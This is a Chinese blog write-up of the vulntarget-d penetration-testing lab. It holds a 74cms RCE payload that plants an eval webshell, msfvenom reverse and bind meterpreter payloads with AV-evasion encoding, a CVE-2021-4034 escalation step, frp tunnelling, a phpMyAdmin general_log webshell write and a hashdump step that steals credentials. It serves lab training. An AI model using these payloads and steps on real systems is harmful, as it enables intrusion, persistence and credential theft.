vulntarget漏洞靶场系列-vulntarget-d

已于 2024-08-29 15:38:58 修改
阅读量382 收藏 8
点赞数 5
分类专栏: vulntarget漏洞靶场 文章标签: web安全 网络
于 2024-08-29 15:36:19 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_63138919/article/details/141679403
版权

vulntarget-d

环境准备:

拓补图:

机器信息:
#攻击机
OS:kali
NIC:192.168.111.128

#Web机器
OS:Ubuntu
Server:骑士CMS/宝塔
NIC1:192.168.111.137
NIC2:10.0.20.129
userpass:eval/vulntarget

#内网机器
OS:windows7
Server:phpstudy
NIC:10.0.20.128
userpass:crow/admin

流程总结:

骑士cms任意代码执行(CVE-2020-35339)->msf反向shell->CVE-2021-4034提权->内网打点->横向移动->phpmyadmin写🐎->msf正向shell->getsystem提权->hashdump抓密码->远程登入拿flag

渗透流程:

通过端口扫描工具,查找靶机IP及端口信息,此处靶机的IP为192.168.111.137,直接扫描靶机IP信息,81端口服务部署了骑士cms,且版本信息为6.0.20

进入后台admin/admin进去

POST /index.php?m=admin&c=index&a=login HTTP/1.1
Host: 192.168.111.137:81
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36
Referer: http://192.168.111.136:81/index.php?m=admin&c=index&a=login
Accept-Language: zh-CN,zh;q=0.9
Origin: http://192.168.111.136:81
Cookie: PHPSESSID=bmcf35ivqa5a1inch9ev74e840; think_template=default; think_language=zh-CN
Content-Length: 107

username=admin&password=admin&geetest_challenge=&geetest_validate=&geetest_seccode=&token=&Ticket=&Randstr=

然后利用 CVE-2020-35339写🐎上线

http://127.0.0.1/.',eval($_POST[a]),'/.com

发现www权限 现在就提权了  

写个msf反向shell

msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.111.137 LPORT=1111 -f elf > 2.elf

 然后上传之后记得chmod一下

#提权
chmod 777 2.elf
#开启监听
msfconsole
use exploit/multi/handler
set payload linux/x64/meterpreter/reverse_tcp
set lhost 192.168.111.129
set lport 1111
run

 最终上线

交互一下

python3 -c 'import pty;pty.spawn("/bin/bash")'

然后这里就是CVE-2021-4034提权了

 下面开始进行内网信息收集

发现还有一个内网 ip 10.0.20.129,那咱们进行frp内网穿透

添加代理(FRP):
服务端:
frpc.ini:bind_port = 12345
客户端:
[common]
server_addr = 192.168.111.137
server_port = 12345


[plugin_socks]
type = tcp
remote_port = 8090
plugin = socks5

 然后运行

kali:
./frps -c frpx.ini
ubuntu:
./frpc -c frpc.ini

然后msf扫一下主机存活

msf6 > use auxiliary/scanner/portscan/tcp
msf6 auxiliary(scanner/portscan/tcp) > set PORTS 21,22,23,80,443,8080,3389,445
PORTS => 21,22,23,80,443,8080,3389,445
msf6 auxiliary(scanner/portscan/tcp) > set RHOSTS 10.0.20.0/24
RHOSTS => 10.0.20.0/24
msf6 auxiliary(scanner/portscan/tcp) > set threads 50
threads => 50
msf6 auxiliary(scanner/portscan/tcp) > run

 发现128存活 进行下一步详细扫描

proxychains nmap -sT -Pn 10.0.20.128 -p22,23,80,139,445,1433,3306,3389,6379,8080

 记得win开一下phpstudy

目录扫描发现phpmyadmin

弱口令root/root进去后台

 下一步就是写🐎了

show global variables like "%genera%";
默认是关闭的所以先将 general_log 设置为on,执行
set global general_log=on;
SET global general_log_file='C:/phpstudy/PHPTutorial/WWW/cmd.php';
SELECT '<?php @eval($_POST["cmd"]); ?>';

 蚁剑弄个代理连

看下内网信息发现存在火绒

那接下来就是免杀 可以看这篇文章

【工具分享】免杀360&火绒的shellcode加载器 (qq.com)

写个msf正向shell

msfvenom -p windows/meterpreter/bind_tcp  -e x86/shikata_ga_nai -i 7 -b '\x00'  lport=1234  -f raw -o crowsec.jpg

msf开启监听,

use exploit/multi/handler
set payload windows/x64/meterpreter/bind_tcp
set lport 2222
set rhost 10.0.20.129

木马直接运行: 

 然后getsystem提权

hashdump抓密码

远程获得flag

知识总结: 

1.骑士cms任意代码执行(CVE-2020-35339)

2.CVE-2021-4034提权

3.phpmyadmin写🐎

4.getsystem提权

5.hashdump抓密码

6.内网frp穿透

7.MSF正反shell生产以及免杀
W3nd4L0v3
关注
  • 5
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
vulntarget漏洞靶场-vulntarget-b
aming小老弟
07-19 3708
vuln靶场
vulntarget靶场系列-a-writeup
渗透测试研究中心
12-13 677
网络配置外网WIN7:ip1: 192.168.127.91/255.255.255.0 ,gw:192.168.127.2 (NAT模式)ip2:10.0.20.98-vmnet1(仅主机模式)域主机成员:10.0.20.99-vmnet1(仅主机模式)10.0.10.111-vmnet2(仅主机模式)域控:10.0.10.110-vmnet2(仅主机模式)密码配置:Win7:win7/adm...
靶场实战】vulntarget-a漏洞靶场实战
TT小子的博客
06-20 738
vulntarget-a漏洞靶场是由vulntarget大佬团队自己设计搭建的靶场,其中涵盖Web漏洞、主机漏洞、域漏洞、工控漏洞等等。
靶场实战】vulntarget-b漏洞靶场实战
TT小子的博客
06-20 1341
vulntarget-b漏洞靶场是由vulntarget大佬团队自己设计搭建的靶场,其中涵盖Web漏洞、主机漏洞、域漏洞、工控漏洞等等。
vulntarget系列vulntarget-b 练习WP
一只爱吃橙子的羊
07-12 976
vulntarget靶场系列vulntarget-b 练习WP,会持续更新……
打穿内网之Vulntarget-a靶场实战记录
tpaer的博客
11-11 2511
内容包括:通达OA未授权上传+文件包含RCE、Redis未授权写马、ms17-010永恒之蓝、代理转发内网跳板、CVE-2020-1472 域控杀器Zerologon、wmiexec/smbexec横向移动、cobalt strike与msf的shell传递
渗透靶场——vulntarget-a(完整版)
tlovejr的博客
03-25 6084
部署环境 此次靶场不再是单个镜像,而是三个镜像文件,接下来先给大家说一下整个环境的拓扑图以环境布置。 只需要把win7外网机和kali机同样的网卡host-Only形式即可,剩下的两台即可也是直接安排好了,无需做任何更改。 靶机下载地址: 信息收集 扫描主机 扫描同一网段中的存活主机 发现一个存活主机(其他的是我自己其他机器)192.168.1.9 扫描端口 扫描一下存活靶机的ip地址 nmap -A -p- 192.168.1.9 一看就知道这个存活靶机是一个win7系统,那么对于win7系统来说,4
渗透靶场——vulntarget-d综合靶场
tlovejr的博客
04-01 2853
部署环境 此次靶场共两个个镜像文件,接下来先给大家说一下整个环境的拓扑图以环境布置。 信息收集 扫描主机 扫描同一网段中的存活主机 发现存活主机ip地址(其他ip是我其他机器的ip地址) 192.168.1.17 扫描端口 扫描一下存活靶机的ip地址 nmap -A -p- 192.168.1.17 发现开放了80、81、3306、8888,看这架势应该是宝塔的界面,那就先访问端口看看 访问80端口发现不可 web渗透 访问81端口 在这里发现了一个骑士的cms框架界面 看到底下的版本信息,搜索
【勒索来袭】vulntarget-n靶场搭建& 打靶流程
crowsec
06-12 1293
vulntarget-n是一个模拟全球化勒索病毒高发环境下的应急响应和取证分析案例,其模拟了一个正常运行的业务服务被勒索病毒攻击的情景
log4j漏洞靶场docker-compose.zip
01-14
其次,靶场是渗透测试和漏洞攻防演练的理想场所。在靶场中,安全专业人员可以模拟攻击者的行为,发现系统和应用的漏洞,并进行渗透测试,从而及时修复和改进防御机制。同时,这也为防御方提供了锻炼机会,通过对抗...
渗透测试上传漏洞经典靶场学习-upload-labs
07-02
### 渗透测试上传漏洞经典靶场学习-upload-labs #### 第一关:绕过前端JS限制 **漏洞概要**:此关卡中的漏洞主要体现在仅在前端JavaScript脚本中进行文件类型的简单验证,而服务器端(后端)并未进行任何有效的...
网络安全】逻辑漏洞:绕过应用程序重要功能
等风来
09-01 189
拦截请求,将其发送到 Burp 中的 Repeater,当我尝试重放请求时,我收到了“ 500 响应”,表示出现错误
网络安全漏洞挖掘
anquan2233的博客
08-29 1483
在springframeworl/expression/spel/stand/InternalSpelExpressionParser/doParseExpression()方法中、会在tokenizer.process()中 对token进行 源码与字节码的判断操作、继续向下。会进入到springframework/cloud/function/context/config/RoutingFunction/functionFromExpression()方法。Payload 的构造可以参考官方测试用例。
网络安全服务基础Windows--第12节-域与活动目录
m0_65771743的博客
09-03 1017
域中的计算机可以共享资源,例如⽂件系统和打印机,⽤户只需在域中进⾏⼀次登录(单点登录),就可以访问其有权限的所有资源。我们在服务器上通过查找⼀个对象可以查到的所有关联信息总和,如⼀个⽤户,如果我们在服务器已给这个⽤户定义了讲如:⽤户名、⽤户密码、⼯作单位、联系电话、家庭住址等,那上⾯所说的总和⼴义上理解就是“⽤户”这个名字的名字空间,因为我们只输⼊⼀个⽤户名即可找到上⾯我所列的⼀切信息。例如,在AD中,域控制器的名称会映射到其在DNS中的记录,以便⽹络中的其他服务和客户端可以找到它。
网络安全(黑客)自学
最新发布
白帽子凯哥聊黑客
09-04 690
网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。无论网络Web、移动、桌面、云等哪个领域,都有攻与防两面性,例如 Web安全技术,既有 Web 渗透,也有 Web 防御技术(WAF)。作为一个合格的网络安全工程师,应该做到攻守兼备,毕竟知己知彼,才能百战百胜。
网络安全知识:什么是访问控制列表 (ACL)?
2401_84434570的博客
09-04 609
使用 ACL 的操作系统包括 Microsoft Windows NT/2000、Novell 的 Netware、Digital 的 OpenVMS 和基于 UNIX 的系统。通常,标准 ACL 实施在靠近其要保护的目的地的位置,而扩展 ACL 则放置在靠近源的位置。ACL 有多种形式,每种形式都适用于不同的场景,并提供不同级别的控制和复杂性。每个对象都与一个安全属性相关联,该属性将其链接到其 ACL,其中包含每个具有该对象访问权限的用户的条目。将最常触发的规则置于 ACL 的顶部以优化性能。
2024年“羊城杯”粤港澳大湾区网络安全大赛 初赛 Web&数据安全&AI 题解WriteUp
Jay17的博客
09-04 671
2024年“羊城杯”粤港澳大湾区网络安全大赛 初赛 Web&数据安全&AI 题解WriteUp
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

W3nd4L0v3

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值